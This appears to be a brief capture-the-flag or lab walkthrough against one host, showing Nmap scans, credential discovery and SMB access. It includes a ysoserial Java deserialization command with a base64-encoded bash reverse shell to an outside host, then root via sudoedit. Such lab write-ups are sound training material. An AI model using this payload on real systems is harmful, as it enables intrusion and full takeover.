Date
Mar 20, 2025 → Mar 20, 2025
Tag
Nmap
Brute Force
Privilege Escalation Techniques
192.168.247.116
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT
Nmap scan report for 192.168.247.116
Host is up (0.071s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT
Warning: 192.168.247.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.247.116
Host is up (0.061s latency).
All 65535 scanned ports on 192.168.247.116 are in ignored states.
Not shown: 65387 open|filtered udp ports (no-response), 148 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 144.82 seconds
80
brute force
no more information, but we can download two file that include 80 website and 8080 website
and we can find the username and password from 8080 websites source code
8080
after we login we can see below page
we also can find the filename of the data
but we have nothing to do on port 8080, so we check others port
445,139
we found that we can access share diver for this host
ysoserial
frohoff • Updated Mar 22, 2025
Use this script to replace the .ser file.
java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMTU4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > recycler.ser
after replace .ser file we can got the shell now
we can use sudoedit
we can edit it if we want
so wee add our account
successful root
